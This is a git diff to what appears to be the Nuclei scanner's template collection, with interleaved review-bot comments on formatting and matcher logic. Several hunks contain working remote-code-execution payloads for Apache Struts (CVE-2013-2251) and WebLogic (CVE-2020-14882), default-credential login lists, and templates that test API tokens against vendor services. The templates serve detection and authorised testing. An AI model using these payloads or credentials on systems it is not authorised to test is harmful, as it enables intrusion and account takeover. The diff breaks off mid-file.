diff --git a/.nuclei-ignore b/.nuclei-ignore index 26f85418fb..bef00b4d7a 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -14,8 +14,3 @@ tags: # files is a list of files to ignore template execution # unless asked for by the user. - -files: - - "token-spray/" - - diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index d322c7908c..67158a4a69 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml 
@@ -11,25 +11,19 @@ info: requests: - raw: - | - GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en - | - GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 + GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: 
{{Hostname}} - Connection: close Accept: */* - Accept-Language: en - | - GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 + GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 Host: {{Hostname}} - Connection: close Accept: */* - Accept-Language: en payloads: params: @@ -40,11 +34,12 @@ requests: matchers-condition: and matchers: - type: status + condition: or status: - 200 - 400 - condition: or + - type: regex + part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - part: body diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 0f87ecde9f..7560cc422d 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml 
@@ -91,15 +91,16 @@ requests: - webviewer - welcome - attack: sniper stop-at-first-match: true matchers-condition: and matchers: + - type: status status: - 200 + - type: word + condition: and words: - "environment variable" - - "display library search paths" - condition: and + - "display library search paths" \ No newline at end of file diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 163e4ead10..24cfb039e5 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -22,14 +22,16 @@ requests: payloads: ids: helpers/wordlists/numbers.txt - attack: sniper + threads: 50 stop-at-first-match: true matchers-condition: and matchers: + - type: status status: - 200 + - type: word words: - "Dashboard" diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 382be20081..e36159a674 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml 
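Review bot: The commit leaves cves/2017/CVE-2017-17562.yaml without a trailing newline: the rewritten last line `+      - "display library search paths"` is immediately followed by `\ No newline at end of file`, which the old side did not have. The same happens at the end of default-logins/grafana/grafana-default-login.yaml (`+          - 200`) and token-spray/README.md. Restore the final newline in all three files; yamllint's `new-line-at-end-of-file` rule flags it, and the next edit to any of them will show a spurious one-line change.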
@@ -28,8 +28,7 @@ requests: - | POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1 Host: {{Hostname}} - cmd: §exec§ - Connection: close + cmd: {{exec}} Content-Type: application/x-www-form-urlencoded; charset=utf-8 _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29 
@@ -41,12 +40,12 @@ requests: matchers-condition: and matchers: + - type: regex + condition: or regex: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" - condition: or - part: body - type: status status: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index dd62e8fa68..80017aa104 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -31,11 +31,12 @@ requests: command: - "systeminfo" # Windows - "lsb_release -a" # Linux - attack: sniper matchers-condition: and matchers: + - type: regex + condition: or regex: - "OS Name:.*Microsoft Windows" - "Distributor ID:" diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml index fac0befccd..20bf91e5e0 100644 --- a/cves/2020/CVE-2020-9757.yaml +++ b/cves/2020/CVE-2020-9757.yaml @@ -22,6 +22,8 @@ requests: path: - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}" + + skip-variables-check: true matchers-condition: and matchers: - type: status diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index 30f759b9cb..125010431f 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -1,4 +1,5 @@ id: grafana-default-login + info: name: Grafana Default Login author: pdteam @@ -26,7 +27,6 @@ requests: username: - admin - admin - password: - prom-operator - admin @@ -35,16 +35,14 @@ requests: matchers: - type: word words: - - grafana_session + - "grafana_session" # Login cookie part: header - # Check for 'grafana_session' cookie on valid login in the response header. - type: word - words: - - Logged in part: body - # Check for valid string on valid login. + words: + - "Logged in" # Logged in keyword - type: status status: - - 200 + - 200 \ No newline at end of file 
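Review bot: The new `skip-variables-check: true` in cves/2020/CVE-2020-9757.yaml carries no explanation, and the reason is not obvious from the key alone: the `{{228*'98'}}` in both `path` entries appears to be the SEOmatic injection probe, which Nuclei would otherwise treat as an unresolved template variable. Without a comment, a later cleanup can drop the key and silently break the template, or copy it into other templates where it would hide a genuinely mistyped variable such as a misspelt `{{BaseURL}}`. Add a comment directly above the key: `# {{228*'98'}} in the paths is the injection probe, not a template variable; the variable check must stay off for this file`.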
diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index aa854686cb..beada2b11a 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -20,15 +20,13 @@ requests: username: - admin - attack: sniper - matchers-condition: and matchers: - type: word + condition: and words: - '"redirect": "/htdocs/pages/main/main.lsp"' - '"error": ""' - condition: and - type: status status: diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 9c7aa9d12a..959da5926b 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -18,22 +18,21 @@ requests: payloads: password: - - 12345 - attack: sniper + - "12345" matchers-condition: and matchers: - type: word + condition: and words: - "session_id=" - "resource" - condition: and - type: word - words: - - "Invalid Password" part: body negative: true + words: + - "Invalid Password" - type: status status: diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml index ad8ba27848..0676457b68 100644 --- a/fuzzing/adminer-panel-fuzz.yaml +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -23,17 +23,17 @@ requests: payloads: path: helpers/wordlists/adminer-paths.txt - attack: sniper threads: 50 stop-at-first-match: true matchers-condition: and matchers: - type: word + condition: and words: - "- Adminer" - - "partial(verifyVersion, " - condition: and + - "partial(verifyVersion" + - type: status status: - 200 diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml index 2fe78b348f..4eab49564e 100644 --- a/fuzzing/mdb-database-file.yaml +++ b/fuzzing/mdb-database-file.yaml 
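Review bot: Removing `matchers-condition: and` from default-logins/hp/hp-switch-default-login.yaml (the `-    matchers-condition: and` line just above `matchers:`) changes how the two matchers combine: Nuclei defaults to `or` when the key is absent, so the trailing `- type: status` matcher (its value list is cut off by the hunk) is on its own enough for a hit, and the `"redirect"`/`"error": ""` word check no longer gates the result. A failed login that still answers with the matched status would then be reported as a working default credential. Restore the line, `matchers-condition: and`, directly above `matchers:`. The same key is also dropped in miscellaneous/ntlm-directories.yaml; that is harmless only if the `dsl` matcher is the sole matcher there, which that hunk does not show.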
@@ -14,12 +14,10 @@ requests: Host: {{Hostname}} Origin: {{BaseURL}} Accept-Language: en-US,en;q=0.9 - Connection: close payloads: mdbPaths: helpers/wordlists/mdb-paths.txt - attack: sniper threads: 50 max-size: 500 # Size in bytes - Max Size to read from server response stop-at-first-match: true diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml index 63fd397d99..11072add7c 100644 --- a/fuzzing/prestashop-module-fuzz.yaml +++ b/fuzzing/prestashop-module-fuzz.yaml @@ -1,4 +1,5 @@ id: prestashop-module-fuzz + info: name: Prestashop Modules Enumeration author: meme-lord @@ -16,19 +17,18 @@ requests: payloads: path: helpers/wordlists/prestashop-modules.txt - attack: sniper - threads: 50 + threads: 50 matchers-condition: and matchers: - type: word + condition: and words: - "" - "" - "" - "" - "" - condition: and - type: status status: diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml index 1af3f07971..c9f21082e4 100644 --- a/fuzzing/wordpress-plugins-detect.yaml +++ b/fuzzing/wordpress-plugins-detect.yaml @@ -1,4 +1,5 @@ id: wordpress-plugins-detect + info: name: WordPress Plugins Detection author: 0xcrypto @@ -13,11 +14,8 @@ requests: payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt - attack: sniper - threads: 50 - redirects: true - max-redirects: 1 + threads: 50 matchers-condition: and matchers: - type: status diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml index 9343703599..dd98af2fe3 100644 --- a/fuzzing/wordpress-themes-detect.yaml +++ b/fuzzing/wordpress-themes-detect.yaml @@ -1,4 +1,5 @@ id: wordpress-themes-detect + info: name: WordPress Theme Detection author: 0xcrypto @@ -13,11 +14,8 @@ requests: payloads: themeSlug: helpers/wordlists/wordpress-themes.txt - attack: sniper - threads: 50 - redirects: true - max-redirects: 1 + threads: 50 matchers-condition: and matchers: - type: status 
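Review bot: Dropping `redirects: true` and `max-redirects: 1` from fuzzing/wordpress-plugins-detect.yaml (and identically from fuzzing/wordpress-themes-detect.yaml) is a behaviour change the commit does not explain, unlike the purely mechanical `attack: sniper` removals around it. The `- type: status` matcher now sees the first response: a host that answers plugin paths with a 301/302 (trailing-slash canonicalisation or an HTTP-to-HTTPS hop) yields the redirect status instead of the final page, so slugs detected before will be missed, while hosts with a catch-all redirect stop producing false positives. If the trade-off is intended, record it next to `threads: 50`, e.g. `# redirects deliberately not followed: catch-all redirects made every slug look present`; if not, re-add the two keys.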
diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml index 1733d4647d..a36f3f1287 100644 --- a/miscellaneous/ntlm-directories.yaml +++ b/miscellaneous/ntlm-directories.yaml @@ -14,6 +14,7 @@ requests: Host: {{Hostname}} Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= + threads: 50 payloads: path: - / @@ -63,9 +64,6 @@ requests: - /webticket/webticketservice.svcabs/ - /adfs/services/trust/2005/windowstransport - attack: sniper - threads: 50 - matchers-condition: and matchers: - type: dsl diff --git a/token-spray/README.md b/token-spray/README.md index 24081b4662..4c463e5694 100644 --- a/token-spray/README.md +++ b/token-spray/README.md 
@@ -1,15 +1,19 @@ ## About + This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant). ## Usage -You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag. -```bash -# Run Nuclei specifying all the api templates: +token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag. -nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest +```console +# Running token-spray templates against a single token to test +nuclei -t token-spray/ -var token=random-token-to-test + +# Running token-spray templates against a file containing multiple new line delimited tokens +nuclei -t token-spray/ -var token=file_with_tokens.txt ``` ## Credits -These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. 
You are welcome to add new templates based on the existing format to cover more APIs. +These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs. \ No newline at end of file diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml index 9282cf7a4d..482dc7bdd9 100644 --- a/token-spray/asana.yaml +++ b/token-spray/asana.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,asana +self-contained: true requests: - method: GET path: @@ -16,6 +17,6 @@ requests: matchers: - type: status + negative: true status: - 401 - negative: true diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml index 0892d85b9f..17c0d216aa 100644 --- a/token-spray/bingmaps.yaml +++ b/token-spray/bingmaps.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,bing,maps,bingmaps +self-contained: true requests: - method: GET path: diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml index 57e1d5d3d4..01c70c7974 100644 --- a/token-spray/bitly.yaml +++ b/token-spray/bitly.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,bitly +self-contained: true requests: - method: GET path: diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml index 77e8e1e677..350b8edd1b 100644 --- a/token-spray/buildkite.yaml +++ b/token-spray/buildkite.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buildkite +self-contained: true requests: - method: GET path: diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml index 229da7b1d5..15d86d53fe 100644 --- a/token-spray/buttercms.yaml +++ b/token-spray/buttercms.yaml 
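Review bot: Adding `self-contained: true` to token-spray/asana.yaml (and to every other token-spray template in this commit) while the same commit removes the `files: - "token-spray/"` entry from `.nuclei-ignore` means these templates now execute whenever a user loads the whole template directory, not only when `-t token-spray/` is given explicitly. Each request is sent to the vendor API host in the template's `path` rather than to the user's target, carrying whatever `{{token}}` resolves to, so a routine scan generates traffic to third-party endpoints outside the intended scope. If Nuclei's unresolved-variable check (the one `skip-variables-check` bypasses elsewhere in this commit) skips these templates when no `-var token` is supplied, the effect is limited to runs that do pass a token, but that should be confirmed rather than assumed. Consider keeping an exclusion in `.nuclei-ignore` by listing `token-spray` under its existing `tags:` block, or state in the README that self-contained templates run by default and contact external hosts.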
@@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buttercms +self-contained: true requests: - method: GET path: diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml index 1d8289fb37..b54a5c8df8 100644 --- a/token-spray/calendly.yaml +++ b/token-spray/calendly.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,calendly +self-contained: true requests: - method: GET path: diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml index 281d22b656..d519f10651 100644 --- a/token-spray/circleci.yaml +++ b/token-spray/circleci.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,circle,circleci +self-contained: true requests: - method: GET path: diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml index 403b97a349..ab73e7ea0d 100644 --- a/token-spray/deviantart.yaml +++ b/token-spray/deviantart.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,deviantart +self-contained: true requests: - method: POST path: diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml index 29679e2b2f..339837160e 100644 --- a/token-spray/dropbox.yaml +++ b/token-spray/dropbox.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,dropbox +self-contained: true requests: - method: POST path: diff --git a/token-spray/github.yaml b/token-spray/github.yaml index c6d1d560de..4722dfe6d3 100644 --- a/token-spray/github.yaml +++ b/token-spray/github.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,github +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml index b3c459082e..ae81be1c96 100644 --- a/token-spray/google-autocomplete.yaml +++ b/token-spray/google-autocomplete.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,autocomplete +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml index 0be1636139..61af504633 100644 
--- a/token-spray/google-customsearch.yaml +++ b/token-spray/google-customsearch.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,search +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml index a6b8cea46b..97aaf95d6c 100644 --- a/token-spray/google-directions.yaml +++ b/token-spray/google-directions.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,directions +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml index 480bc31fb7..31b68e98de 100644 --- a/token-spray/google-elevation.yaml +++ b/token-spray/google-elevation.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,elevation +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml index aba6f43579..8ca7a1653f 100644 --- a/token-spray/google-fcm.yaml +++ b/token-spray/google-fcm.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,fcm,firebase,cloud,messaging +self-contained: true requests: - method: POST path: diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml index dcecba34b2..1fe4c209e8 100644 --- a/token-spray/google-findplacefromtext.yaml +++ b/token-spray/google-findplacefromtext.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,find,text +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml index 62795ea15e..42987ebfe1 100644 --- a/token-spray/google-gedistancematrix.yaml +++ b/token-spray/google-gedistancematrix.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,distance,matrix +self-contained: true requests: - method: GET path: 
diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml index 91826af391..dbba7431d5 100644 --- a/token-spray/google-geocode.yaml +++ b/token-spray/google-geocode.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,geocode +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml index 88d1ce9ffc..a322b89967 100644 --- a/token-spray/google-geolocation.yaml +++ b/token-spray/google-geolocation.yaml @@ -6,19 +6,21 @@ info: severity: info tags: token-spray,google,geolocation +self-contained: true requests: - method: GET path: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - matchers-condition: and + matchers-condition: and matchers: - type: word part: body + negative: true words: - 'error' - negative: true + - type: status + negative: true status: - 404 - negative: true diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml index d7b47585f1..f8689ae282 100644 --- a/token-spray/google-mapsembed.yaml +++ b/token-spray/google-mapsembed.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,maps,embed +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml index 5f8e4d2721..171ff4b005 100644 --- a/token-spray/google-mapsembedadvanced.yaml +++ b/token-spray/google-mapsembedadvanced.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,maps,embed +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml index 752d9d9814..db0dda7fab 100644 --- a/token-spray/google-nearbysearch.yaml +++ b/token-spray/google-nearbysearch.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,search,nearby +self-contained: true requests: - method: GET path: 
diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml index e804422ff0..9551876122 100644 --- a/token-spray/google-nearestroads.yaml +++ b/token-spray/google-nearestroads.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,roads +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml index 30ca3e6184..2f6cf7d464 100644 --- a/token-spray/google-placedetails.yaml +++ b/token-spray/google-placedetails.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,place,details +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml index 82f33c2e1d..6b6b3cd539 100644 --- a/token-spray/google-placesphoto.yaml +++ b/token-spray/google-placesphoto.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,places,photo +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml index 2e38d6316a..6dce339499 100644 --- a/token-spray/google-playablelocations.yaml +++ b/token-spray/google-playablelocations.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,playable,locations +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml index c97cfcee59..2c0853eda0 100644 --- a/token-spray/google-routetotraveled.yaml +++ b/token-spray/google-routetotraveled.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,route +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml index 5eec3d0a53..e5e8290a6a 100644 --- a/token-spray/google-speedlimit.yaml +++ b/token-spray/google-speedlimit.yaml 
@@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,speed,limit +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml index d4a012bff2..ba4ee679ca 100644 --- a/token-spray/google-staticmaps.yaml +++ b/token-spray/google-staticmaps.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,maps +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml index 49d043391d..d7156a7295 100644 --- a/token-spray/google-streetview.yaml +++ b/token-spray/google-streetview.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,streetview +self-contained: true requests: - method: GET path: diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml index 273101bcc9..40b13b61ca 100644 --- a/token-spray/google-timezone.yaml +++ b/token-spray/google-timezone.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,timezone +self-contained: true requests: - method: GET path: diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml index c3683703cf..290da60328 100644 --- a/token-spray/googlet-extsearchplaces.yaml +++ b/token-spray/googlet-extsearchplaces.yaml @@ -6,6 +6,7 @@ info: severity: info tags: token-spray,google,search,places,text +self-contained: true requests: - method: GET path: @@ -14,6 +15,6 @@ requests: matchers: - type: word part: body + negative: true words: - 'error_message' - negative: true diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml index 9f08e416d5..ef81ec91e8 100644 --- a/token-spray/heroku.yaml +++ b/token-spray/heroku.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,heroku +self-contained: true requests: - method: POST path: @@ -17,9 +18,9 @@ requests: matchers: - type: status + condition: or status: - 200 - 201 - 202 - 206 - condition: or 
diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml index 86566864f0..da95a4b12a 100644 --- a/token-spray/hubspot.yaml +++ b/token-spray/hubspot.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,hubspot +self-contained: true requests: - method: GET path: diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml index 289546f452..dd851bee3e 100644 --- a/token-spray/instagram.yaml +++ b/token-spray/instagram.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,instagram,graph +self-contained: true requests: - method: GET path: diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml index f64daea02e..ac527d2a1e 100644 --- a/token-spray/ipstack.yaml +++ b/token-spray/ipstack.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,ipstack +self-contained: true requests: - method: GET path: diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml index 0c1f84d566..69da55de5d 100644 --- a/token-spray/iterable.yaml +++ b/token-spray/iterable.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,iterable +self-contained: true requests: - method: GET path: diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml index 